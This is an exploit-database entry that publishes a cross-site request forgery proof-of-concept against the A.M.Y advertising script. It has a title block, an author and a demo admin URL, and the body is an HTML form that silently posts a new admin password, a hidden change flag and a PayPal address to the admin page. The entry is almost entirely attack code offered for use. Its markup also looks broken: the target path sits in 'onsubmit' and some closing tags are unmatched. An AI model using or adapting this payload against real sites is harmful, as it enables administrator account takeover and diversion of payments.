A.M.Y CSRF (change admin password)



EKU-ID: 1628 CVE: OSVDB-ID:
Author: Jonturk75 Published: 2012-03-12 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: A.M.Y CSRF (change admin password)
# Author: Jonturk75
# Category:: webapps
# Demo site: http://calendarscripts.info/demos/amy/admin.php


<form onsubmit="amy/admin.php;" method="post">
<input type="password" size="30" name="adminpass"/></p>
<input type="password" size="30" name="repass"/></p>
<input type="hidden" value="1" name="changepass"/>
<p><input type="checkbox" checked="" value="1" name="email_on_signup"/> Email me when a new advertiser signs up.</p>
<input type="text" size="30" value="paypal@mysite.com" name="paypal"/></p>
<p align="center"><input type="submit" value="Save Settings"/></p>